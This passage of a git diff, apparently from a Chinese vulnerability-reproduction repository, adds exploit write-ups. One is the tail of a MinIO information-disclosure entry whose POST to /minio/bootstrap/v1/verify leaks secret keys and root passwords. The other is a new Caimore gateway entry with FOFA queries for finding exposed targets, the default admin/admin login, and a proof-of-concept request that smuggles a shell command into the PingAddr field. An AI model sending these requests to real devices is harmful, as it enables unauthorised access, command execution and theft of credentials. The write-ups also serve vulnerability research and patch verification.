是一个多云对象存储框架。在从RELEASE.2019-12-17T23-16-33Z开始到RELEASE.2023-03-20T20-16-18Z之前的集群部署中,MinIO存在漏洞发送请求后返回所有环境变量,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,导致信息泄露。分布式部署的所有用户都会受到影响 + +## 漏洞影响 + +``` +MinIO <= RELEASE.2023-03-20T20-16-18Z +``` + +## FOFA + +``` +app="minio" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093052971](images/image-20230417093052971.png) + +验证POC (默认端口:9000) + +``` +POST /minio/bootstrap/v1/verify +``` + +![image-20230417093122553](images/image-20230417093122553.png) \ No newline at end of file diff --git a/服务器应用漏洞/images/image-20230417093052971.png b/服务器应用漏洞/images/image-20230417093052971.png new file mode 100644 index 0000000..664dcef Binary files /dev/null and b/服务器应用漏洞/images/image-20230417093052971.png differ diff --git a/服务器应用漏洞/images/image-20230417093122553.png b/服务器应用漏洞/images/image-20230417093122553.png new file mode 100644 index 0000000..901b1fb Binary files /dev/null and b/服务器应用漏洞/images/image-20230417093122553.png differ diff --git a/网络设备漏洞/images/image-20230417100349175.png b/网络设备漏洞/images/image-20230417100349175.png new file mode 100644 index 0000000..e891ef1 Binary files /dev/null and b/网络设备漏洞/images/image-20230417100349175.png differ diff --git a/网络设备漏洞/images/image-20230417100401289.png b/网络设备漏洞/images/image-20230417100401289.png new file mode 100644 index 0000000..7fdb8da Binary files /dev/null and b/网络设备漏洞/images/image-20230417100401289.png differ diff --git a/网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md b/网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md new file mode 100644 index 0000000..9105b84 --- /dev/null +++ b/网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md @@ -0,0 +1,34 @@ +# 才茂通信 网关 formping 远程命令执行漏洞 + +## 漏洞描述 + +才茂通信网关 formping 接口存在远程命令执行漏洞,攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限 + +## 漏洞影响 + +``` +才茂通信 网关 +``` + +## FOFA + +``` +app="CAIMORE-Gateway" +``` + +## 漏洞复现 + +登陆页面,默认口令 admin/admin + +![image-20230417100349175](images/image-20230417100349175.png) + +验证POC + +``` +POST /goform/formping +Authorization: Basic YWRtaW46YWRtaW4= + +PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg= +``` + +![image-20230417100401289](images/image-20230417100401289.png) \ No newline at end of file